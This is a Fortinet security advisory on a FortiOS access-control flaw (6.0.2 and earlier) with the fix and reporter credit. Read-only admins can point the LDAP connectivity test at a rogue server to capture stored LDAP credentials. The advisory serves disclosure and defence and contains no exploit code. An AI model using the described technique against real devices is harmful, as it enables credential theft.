PSIRT Advisory

Read-only admins can obtain LDAP credentials configured in FortiGate using LDAP test connectivity feature

Summary

Fortigate's read-only admins are able to point a LDAP server connectivity test request to a rogue LDAP server instead of the configured one, in order to obtain the LDAP server login credentials configured in the FortiGate.

Impact

Improper Access Control

Affected Products

FortiOS 6.0.2 and before

Solutions

Upgrade to FortiOS 6.0.3 or upcoming 6.2.0

Acknowledgement

Fortinet is pleased to thank Julio Engels Ureña Martinez for reporting this vulnerability under responsible disclosure.